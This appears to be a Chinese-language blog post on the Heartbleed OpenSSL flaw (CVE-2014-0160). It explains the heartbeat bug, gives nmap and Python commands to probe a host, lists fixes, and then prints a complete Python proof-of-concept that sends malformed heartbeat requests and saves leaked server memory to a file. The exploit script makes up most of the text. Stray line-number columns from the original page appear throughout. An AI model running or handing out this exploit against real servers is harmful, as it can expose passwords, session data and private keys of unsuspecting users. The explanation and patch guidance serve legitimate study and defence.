heartbleed漏洞利用

心脏滴血漏洞。
漏洞源于openssl对TLS/DTLS (transport layer security protocols)协议心跳扩展功能的实现. 通过漏洞每次可以泄漏服务器内存64K大小的数据内容，其中可能包含用户名、密码、私钥等敏感数据.

heartbeats的作用

受影响版本：OpenSSL 1.0.1 - 1.0.1f 存在漏洞
heartbeat数据结构体

struct hb { 
int type; 
int length; 
unsigned char *data; 
}; 
1
2
3
4
5
6

type为heartbeat类型，length为data大小，data字段的内容组成分为type字段占1个字节，payload字段占2个字节，其余的为payload的具体内容

Payload内容

0 类型,type 
1-2 data中具体的内容的大小,payload 
3-len 具体的内容,pl 
1
2
3
4

假如客户端发送的data数据为"007abcdefg"，那么服务器端解析可以得到type=0, payload=07, pl='abcdefg'，申请(1+2+7=10)大小的内存，然后再将type, payload, pl写到新申请的内存中

漏洞代码(OpenSSL 中的 ssl/d1_both.c 文件中dtls1_process_heartbeat 函数)
………….
buffer = OPENSSL_malloc(1 + 2 + payload + padding); //根据 payload 分配内存，额外的3字节用于存放类型和长度
………….
memcpy(bp, pl, payload); //填充回应包的载荷

exploit：

nmap --script=ssl-heartbleed -p 443 www.example.com 
python heartbleed-poc.py -p 443 www.example.com
1
2
3

参考更丰富的方案：
1)http://www.freebuf.com/sectool/32785.html
2)http://heartbleed.com/
3)http://www.cnblogs.com/milantgh/p/3728350.html

修复方案：
1）升级到openssl 1.0.1g或更新版本
2）重新编译openssl，在编译时增加参数 -DOPENSSL_NO_HEARTBEATS 关闭心跳扩展功能
3）撤销数字证书，以免证书被窃取后篡改使用Man-In-Middle攻击

heartbleed-poc.py:

#!/usr/bin/python
 
# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtplib
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')
hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')
hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')
def hexdump(s, dumpf, quiet):
    dump = open(dumpf,'a')
    dump.write(s)
    dump.close()
    if quiet: return
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print
def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            if not rdata:
                return None
            else:
                return rdata
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay
def hit_hb(s, dumpf, host, quiet):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received from '+host+', server likely not vulnerable'
            return False
        if typ == 24:
            if not quiet: print 'Received heartbeat response:'
            hexdump(pay, dumpf, quiet)
            if len(pay) > 3:
                print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!'
            else:
                print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.'
            return True
        if typ == 21:
            if not quiet: print 'Received alert:'
            hexdump(pay, dumpf, quiet)
            print 'Server '+ host +' returned error, likely not vulnerable'
            return False
def connect(host, port, quiet):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if not quiet: print 'Connecting...'
    sys.stdout.flush()
    s.connect((host, port))
    return s
def tls(s, quiet):
    if not quiet: print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    if not quiet: print 'Waiting for Server Hello...'
    sys.stdout.flush()
def parseresp(s):
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return 0
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            return ver
def check(host, port, dumpf, quiet, starttls):
    response = False
    if starttls:
        try:
            s = smtplib.SMTP(host=host,port=port)
            s.ehlo()
            s.starttls()
        except smtplib.SMTPException:
            print 'STARTTLS not supported...'
            s.quit()
            return False
        print 'STARTTLS supported...'
        s.quit()
        s = connect(host, port, quiet)
        s.settimeout(1)
        try:
            re = s.recv(1024)
            s.send('ehlo starttlstest\r\n')
            re = s.recv(1024)
            s.send('starttls\r\n')
            re = s.recv(1024)
        except socket.timeout:
            print 'Timeout issues, going ahead anyway, but it is probably broken ...'
        tls(s,quiet)
    else:
        s = connect(host, port, quiet)
        tls(s,quiet)
    version = parseresp(s)
    if version == 0:
        if not quiet: print "Got an error while parsing the response, bailing ..."
        return False
    else:
        version = version - 0x0300
        if not quiet: print "Server TLS version was 1.%d\n" % version
    if not quiet: print 'Sending heartbeat request...'
    sys.stdout.flush()
    if (version == 1):
        s.send(hbv10)
        response = hit_hb(s,dumpf, host, quiet)
    if (version == 2):
        s.send(hbv11)
        response = hit_hb(s,dumpf, host, quiet)
    if (version == 3):
        s.send(hbv12)
        response = hit_hb(s,dumpf, host, quiet)
    s.close()
    return response
def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
    for i in xrange(0,opts.num):
        check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
if __name__ == '__main__':
    main()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214